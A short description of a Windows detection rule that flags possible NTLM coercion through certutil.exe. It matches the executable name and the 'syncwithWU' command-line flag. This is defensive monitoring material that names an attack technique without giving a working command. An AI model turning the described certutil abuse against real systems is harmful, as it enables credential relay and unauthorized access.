This rule is designed to detect potential NTLM coercion attacks leveraging the Certutil.exe utility on Windows systems. NTLM coercion is a method that allows attackers to manipulate NTLM challenges to gain unauthorized access. The detection specifically focuses on instances where Certutil is invoked with the 'syncwithWU' flag in its command line, which indicates an attempt to change the default behavior of the tool, often used in attack scenarios. The rule captures processes associated with Certutil.exe by checking if the executable’s path ends with 'certutil.exe' or if its original filename matches. It requires that the command line includes specific keywords associated with the coercion method. This detection is crucial for monitoring and securing environments against NTLM-based attacks that exploit misconfigurations or vulnerabilities in the Windows authentication mechanisms.